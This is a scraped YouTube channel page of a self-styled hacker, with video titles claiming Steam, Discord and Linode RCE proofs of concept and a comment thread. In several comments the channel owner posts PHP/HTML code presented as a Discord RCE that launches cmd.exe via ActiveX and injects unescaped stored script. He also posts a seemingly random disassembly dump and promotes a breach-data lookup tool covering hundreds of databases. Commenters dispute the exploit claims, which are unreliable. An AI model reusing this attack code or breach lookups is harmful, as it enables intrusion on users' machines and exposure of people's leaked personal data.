Тёмный
ClumsyLulz
ClumsyLulz
ClumsyLulz
Подписаться
I DO NOT HAVE A TWITTER ACCOUNT
www.linkedin.com/in/clumsy/
www.t.me/SleepTheGod
www.ClumsyLulz.medium.com
www.SoundCloud.com/DoXeD
www.Hackerone.com/DBMS
www.Bugcrowd.com/Sleep
www.Github.com/SleepTheGod

Xbox 360 Dashboard on PC
2:37
13 часов назад
Untitled video
0:38
День назад
Steam RCE PoC
1:24
День назад
Discord PoC
0:21
День назад
hackerman talk
1:35
14 дней назад
MOM HE'S HACKING!
0:27
14 дней назад
Discord.gg/Killers
0:22
14 дней назад
freepbx exploit still works
0:37
14 дней назад
XBOX NXE UI UX
0:12
14 дней назад
HackForums Reflected XSS
0:06
14 дней назад
Life Could Be A Dream
1:39
21 день назад
Baron Samedi, mighty loa of the dead
1:56
21 день назад
The Impossible Game 1 Attempt Beat
1:39
28 дней назад
KILLDOZER SIMULATOR Steam
0:47
28 дней назад
Raw Freestyle one take
1:53
28 дней назад
Linux GPT
2:53
28 дней назад
Bitcoin Bet Game PoC
0:33
28 дней назад
W3Schools Exploit Poc
1:05
28 дней назад
Steam Remote Code Execution Proof
1:30
Месяц назад
WARNING I DO NOT HAVE A TWITTER
0:07
Месяц назад
Linode RCE
1:15
Месяц назад
Kevin Mitnick Unreleased Phone Call
5:24
Месяц назад
irc flood insurance
8:30
Месяц назад
Комментарии
@maxwelleschete332
@maxwelleschete332 День назад
pack it up fruit patrol
@stripped
@stripped 6 часов назад
so what's it like in Wisconsin
@maxwelleschete332
@maxwelleschete332 6 часов назад
@@stripped I don’t live there
@FairyTales-zn9zu
@FairyTales-zn9zu 3 дня назад
This is true i took my dog dna and sent it and he came back 52% asian 17% black 41% eurppean i swear these tests are scams
@HitSkitz
@HitSkitz 4 дня назад
Hey this is my main channel. - Evan
@stripped
@stripped 6 часов назад
wut
@HitSkitz
@HitSkitz 6 часов назад
@@stripped It's your old Xbox bro I'm going to upload some new skits. Shocking and offensive!
@taz_da_goat
@taz_da_goat 7 дней назад
Starship troopers 🫶🏽🫶🏽🫶🏽
@5RR
@5RR 8 дней назад
i don't get it
@stripped
@stripped 7 дней назад
@@5RR Elaborate
@stripped
@stripped 7 дней назад
Did you read the description
@seteletaf
@seteletaf 11 дней назад
I'm EvKrev & Seteletaf - Pwnage21/oH nO uR ReDBaR/VioletTourist/CelticBrony/TheDarkPsalmist etc You have risen above your first teacher. Lol I remember giving you installs.
@stripped
@stripped 7 дней назад
@@seteletaf broooooo what's ur discord
@stripped
@stripped 7 дней назад
Gt Ig Films V7
@seteletaf
@seteletaf 5 дней назад
@@stripped give me a link to your discord and I will talk with you gladly
@stripped
@stripped 6 часов назад
@@seteletaf clumsylulz
@EvKrev
@EvKrev 11 дней назад
My old xbox-live friend WOOOO I'm the Yoda that first taught you. WOOOOO MA MAN HAHA Celtic x DebiDaily
@stripped
@stripped 7 дней назад
@@EvKrev yeee
@stripped
@stripped 7 дней назад
@@EvKrev t.me/SleepTheGod
@stripped
@stripped 7 дней назад
Gt Ig Films V7
@EvKrev
@EvKrev 12 дней назад
I made a rap once, it's on my channel called "My First Christian Rap" freestyle. Ol'sleep..
@EvKrev
@EvKrev 12 дней назад
SleepTheGod, it is Celtic(not-a-brony)Brony from radio graffiti True Capitalist Radio, who was your old Xbox Live friend, who first taught you how to hack on a minuscule level. Just Botnet shit and Ratnet. Dude, it's 2024 and you're still hacking? Holy fuck I did that in 2007-2013. Yo man let's link up again. I could get discord. I would love to talk to you again. Shit hasn't been the same for me since the old days. I'm a poor man pirating vids on a laptop pan-handeling. I know damn well you remember me man, I started it all for you brother.
@Zer0SecLinux
@Zer0SecLinux 13 дней назад
Cool
@memesandgtag
@memesandgtag 16 дней назад
I have it wishlist when do you plan to release it? If you’re the developer, otherwise never mind.
@mishal_legit
@mishal_legit 16 дней назад
Not the ARP spoof 😭
@stripped
@stripped 23 дня назад
This is how you make discord on a windows system open then execute a payload without the uri this is why I use the browser version <?php // Database connection details $servername = "localhost"; $username = "your_username"; $password = "your_password"; $dbname = "your_database"; // Create connection $conn = new mysqli($servername, $username, $password, $dbname); // Check connection if ($conn->connect_error) { die("Connection failed: " . $conn->connect_error); } // Fetch the script content from the database $sql = "SELECT script_content AS AlertMessage FROM scripts WHERE id = 1"; $result = $conn->query($sql); if ($result->num_rows > 0) { // Output data of each row $row = $result->fetch_assoc(); $script_content = $row["AlertMessage"]; } else { $script_content = "<script>alert('Script not found');</script>"; } $conn->close(); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Redirecting...</title> <script> onload = function() { alert("LOL YOU SURE YOU KNOW WHAT YOU ARE DOING HERE CLICK OK TO POP DISCORD"); }; function getQueryParam(param) { const urlParams = new URLSearchParams(window.location.search); return urlParams.get(param); } function isValidPayload(payload) { // Add validation logic for the payload, e.g., regex match const regex = /^[a-zA-Z0-9_-]+$/; // Example: alphanumeric, underscore, hyphen return regex.test(payload); } function openCmd() { try { var shell = new ActiveXObject("WScript.Shell"); shell.run("cmd.exe"); } catch (e) { alert("This action is not supported in this browser or is blocked for security reasons."); } } window.onload = function() { alert("LOL YOU SURE YOU KNOW WHAT YOU ARE DOING HERE CLICK OK TO POP DISCORD"); const payload = getQueryParam('payload'); let targetUrl = 'discord.com/handoff'; if (payload && isValidPayload(payload)) { targetUrl += `?payload=${encodeURIComponent(payload)}`; if (payload === 'openCmd' && window.ActiveXObject) { openCmd(); } } setTimeout(function() { window.location.href = targetUrl; }, 3000); } </script> </head> <body> <p>If you are not redirected automatically, <a id="redirectLink" href="discord.com/handoff">click here</a>.</p> <script> const payload = getQueryParam('payload'); let targetUrl = 'discord.com/handoff'; if (payload && isValidPayload(payload)) { targetUrl += `?payload=${encodeURIComponent(payload)}`; if (payload === 'openCmd' && window.ActiveXObject) { openCmd(); } } document.getElementById('redirectLink').href = targetUrl; </script> <?php echo $script_content; // Inject the script content from the database ?> </body> </html>
@stripped
@stripped 23 дня назад
Here is how this is an rce before trolls ask <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Redirecting...</title> <script> function getQueryParam(param) { const urlParams = new URLSearchParams(window.location.search); return urlParams.get(param); } function isValidPayload(payload) { // Add validation logic for the payload, e.g., regex match const regex = /^[a-zA-Z0-9_-]+$/; // Example: alphanumeric, underscore, hyphen return regex.test(payload); } function openCmd() { try { var shell = new ActiveXObject("WScript.Shell"); shell.run("cmd.exe"); } catch (e) { alert("This action is not supported in this browser or is blocked for security reasons."); } } window.onload = function() { const payload = getQueryParam('payload'); let targetUrl = 'discord.com/handoff'; if (payload && isValidPayload(payload)) { targetUrl += `?payload=${encodeURIComponent(payload)}`; if (payload === 'openCmd' && window.ActiveXObject) { openCmd(); } } setTimeout(function() { window.location.href = targetUrl; }, 3000); } </script> </head> <body> <p>If you are not redirected automatically, <a id="redirectLink" href="discord.com/handoff">click here</a>.</p> <script> const payload = getQueryParam('payload'); let targetUrl = 'discord.com/handoff'; if (payload && isValidPayload(payload)) { targetUrl += `?payload=${encodeURIComponent(payload)}`; if (payload === 'openCmd' && window.ActiveXObject) { openCmd(); } } document.getElementById('redirectLink').href = targetUrl; </script> </body> </html>
@stripped
@stripped 23 дня назад
Here is a repo read this bozos github.com/SleepTheGod/Discord-RCE/
@Maconha_games
@Maconha_games 25 дней назад
Geometry dash 2???!?!?!?!?!?!?!?!?!?!?!?!?!?!?!??!?!?!?!?!?!??!?!?!?!??!?!?!?!!?!??!?!!?!?!?!?!?!?!?!??!?!?!?!
@Land-Shark
@Land-Shark 26 дней назад
They DNA tested Jim Morrison and, it turns out, he really IS the Lizard King...
@oscarthecat13
@oscarthecat13 27 дней назад
Ever heard of this thing called geometry dash? It's like the impossible game, but there's more stuff.
@pasta_real
@pasta_real 27 дней назад
bro let him play
@oscarthecat13
@oscarthecat13 27 дней назад
@@pasta_real Ok.
@Sessi4
@Sessi4 27 дней назад
​@@oscarthecat13hi 1 minute ago
@MAOK1
@MAOK1 27 дней назад
Geometry Dash is inspired from this
@oscarthecat13
@oscarthecat13 27 дней назад
@@MAOK1 yeah, I know. GD is essentially a remake of it, but with much more content.
@pupl_birb
@pupl_birb 27 дней назад
gUyS iTs A gEoMeTrY dAsH cLoNe
@mouaad_games8
@mouaad_games8 28 дней назад
I think this is just an environnement made to run code on it
@user-lj4lo7cx7m
@user-lj4lo7cx7m 29 дней назад
Where's the exploit?
@stripped
@stripped 25 дней назад
smh
@John-t1d
@John-t1d 29 дней назад
How is this harmful to People of Color?
@hippynochill
@hippynochill 29 дней назад
Honestly kinda fucking fye
@average2bpvp332
@average2bpvp332 29 дней назад
what did i just watch... this aint no rce? 1. you leaked your linode ip addr. 2. close a bit of ur apps and ur tabs gawd damn. 3. how did u fumble an used port 💀 allowing it in ufw wont make it "not used"
@ricardoteixeira5436
@ricardoteixeira5436 29 дней назад
Wow, man i've seen your github and you look like a master hacker! I even saw that you posted a PoC of steam RCE through their API!! I googled it too and didn't find anything about it, you must be really good if you find such Critical CVEs and doesn't even report them. And this w3schools exploit? Again, you probably are a god hacker! Since you've posted this on youtube, didn't report it ( since i again, could not find a CVE relating to this "vulnerability" ), and didn't even explain it! It's probably so complex!! RCE + LPE in the same exploit? wow, i guess they didn't know how to use docker then, n0obs! got pwned!
@itsanantsingh
@itsanantsingh Месяц назад
bro its not an exploit. U can run commands there easily and read /etc/shadow as well. not new.
@ahmjksjssd
@ahmjksjssd Месяц назад
aren't you just root inside your allocated container?
@enderagent
@enderagent Месяц назад
Isn't this just a docker container? They would not just execute your code on their main web server. How were you able to view the /etc/shadow without sudo
@RRQFarhannGG
@RRQFarhannGG Месяц назад
Are this tool still available ? how to access it?
@stripped
@stripped 7 дней назад
I have not released it
@kindaanl4573
@kindaanl4573 Месяц назад
bro saiddenied by hackerone OFC IT GETS DENIED
@user-ll8ro7ju5l
@user-ll8ro7ju5l Месяц назад
Do you have any recommendations for me to start in this world?
@matiaskp7184
@matiaskp7184 Месяц назад
Maybe add subtitles to it??
@reginasutton923
@reginasutton923 Месяц назад
send cat dna - I've always wondered about those
@dotnet9830
@dotnet9830 Месяц назад
lay off the meth ffs
@sh3izy3
@sh3izy3 Месяц назад
After sending a subscription message, the connection is disconnected after some time. The logs do not contain any explicit indication of the reason for the disconnection. Possible causes may be related to internal server errors or incorrect processing of web socket frames?
@stripped
@stripped Месяц назад
Read the github link the only reason it disconnected is because I made it do so
@stripped
@stripped Месяц назад
github.com/SleepTheGod/Test_PoC
@stripped
@stripped Месяц назад
0x0000000000000000: 81 C0 B9 D6 81 83 add eax, 0x8381d6b9 0x0000000000000006: C2 F4 EE ret 0xeef4 0x0000000000000009: F3 9B wait 0x000000000000000b: EC in al, dx 0x000000000000000c: A1 A1 D8 B2 E5 F1 E6 A5 F4 movabs eax, dword ptr [0xf4a5e6f1e5b2d8a1] 0x0000000000000015: E1 9B loope 0xffffffffffffffb2 0x0000000000000017: FA cli 0x0000000000000018: A1 A1 D8 B2 E5 F1 9B EC A1 movabs eax, dword ptr [0xa1ec9bf1e5b2d8a1] 0x0000000000000021: A1 8A 93 E7 CB ED 97 E6 EA movabs eax, dword ptr [0xeae697edcbe7938a] 0x000000000000002a: F5 cmc 0x000000000000002b: E4 CD in al, 0xcd 0x000000000000002d: E0 D1 loopne 0 0x000000000000002f: 9E sahf 0x0000000000000030: B8 F6 CF A6 B2 mov eax, 0xb2a6cff6 0x0000000000000035: F4 hlt 0x0000000000000036: E1 A5 loope 0xffffffffffffffdd 0x0000000000000038: D3 E5 shl ebp, cl
@sh3izy3
@sh3izy3 Месяц назад
@@stripped This sequence looks like a set of random commands rather than a logically organized code, which can be the result of an error, intentional data corruption, or simply generating a random sequence of commands for analysis or testing.
@tonik2558
@tonik2558 Месяц назад
Bro fell for the honeypot 💀💀💀
@stripped
@stripped Месяц назад
elaborate on how this is a honeypot please
@tonik2558
@tonik2558 25 дней назад
It's a decoy file. If anyone accesses it, they know that person ran a dirbuster search on their host. You should know that's also illegal 😂
@stripped
@stripped 25 дней назад
@@tonik2558 false
@tonik2558
@tonik2558 24 дня назад
@@stripped It's possibly not a honeypot, but it's still not a vulnerability. If it was actually a file being leaked, how is it that no other /etc files can be accessed? Stuff like passwd, issue, fstab? You can access /etc/resolv.conf, but it also contains the gcp internal address. This makes me think it's some kind of config file they copy when creating new servers... You're just salty you didn't get paid for running dirbuster
@marvalousg809
@marvalousg809 Месяц назад
😳
@giantfamilydogs
@giantfamilydogs Месяц назад
bro why you keep blocking me after adding me.
@stripped
@stripped Месяц назад
I got suspended again add me on discord clumsylulz
@stripped
@stripped Месяц назад
I currently don't have a twitter account
@giantfamilydogs
@giantfamilydogs Месяц назад
@@stripped again?
@ISCREAMCRONE
@ISCREAMCRONE Месяц назад
Lolol
@Yoru1x
@Yoru1x 2 месяца назад
yoo can u slide me some usernames?
@stripped
@stripped Месяц назад
I posted the code on hackforums hackforums.net/showthread.php?tid=6271975
@Yoru1x
@Yoru1x Месяц назад
@@strippedcan u post a video on how to download it ?
@stripped
@stripped 7 дней назад
Heh
@coffinplayz
@coffinplayz 2 месяца назад
can u send me burpsuite dom evader extension
@stripped
@stripped 2 месяца назад
Unzip XellLaunch.zip Copy to Partition 3 \Apps\XellLaunch Unzip Xell-Launch-Shortcut.zip Copy to Partition 3 Content\0000000000000000\C0DE9999\00080000 Xell Launch should now appear under the Demo's section on the Xbox 360's dashboard. You will be able to boot directly in to Xell Reloaded (has HDMI support) from the Microsoft Dashboard. Download Xell Launch with Xell Reloaded Download Xell Launch Shortcut
@stripped
@stripped 2 месяца назад
Shout out to dapp
@stripped
@stripped 2 месяца назад
Mirror archive.ph/sSCAu
@stripped
@stripped 2 месяца назад
www.mediafire.com/file/mrq7h6p18hyy2gq/Xbox_Hacking.rar/file
@stripped
@stripped 2 месяца назад
You will also need this www.mediafire.com/file/mrq7h6p18hyy2gq/Xbox_Hacking.rar/file
@stripped
@stripped 2 месяца назад
You need aura 360 a jtag or rgh you need to burn a gentoo iso to a dvd dual air r+w you will also need excell 360 as well as www.poweriso.com/download.htm
@stripped
@stripped 2 месяца назад
power iso is the burner to burn the firmware to the disk make sure you burn it as a bootable iso
@d3vboi
@d3vboi 2 месяца назад
this is literally just a wrapper for snusbase's api, trying to hide the url in hex is pretty scummy
@tonik2558
@tonik2558 2 месяца назад
It's probably an unintended debug api they left open. Hex encoding it means those enterprise scanners won't find it possibly. it only seems to have like 6 breaches though, not really that important
@stripped
@stripped Месяц назад
But how did i get the api endpoint without an api key
@stripped
@stripped 7 дней назад
And my new version I'm building isn't just snusbase I have 784 dbs
@moyomo
@moyomo 2 месяца назад
why did you encode the url in hex?
@zachchayer
@zachchayer 2 месяца назад
Very cool!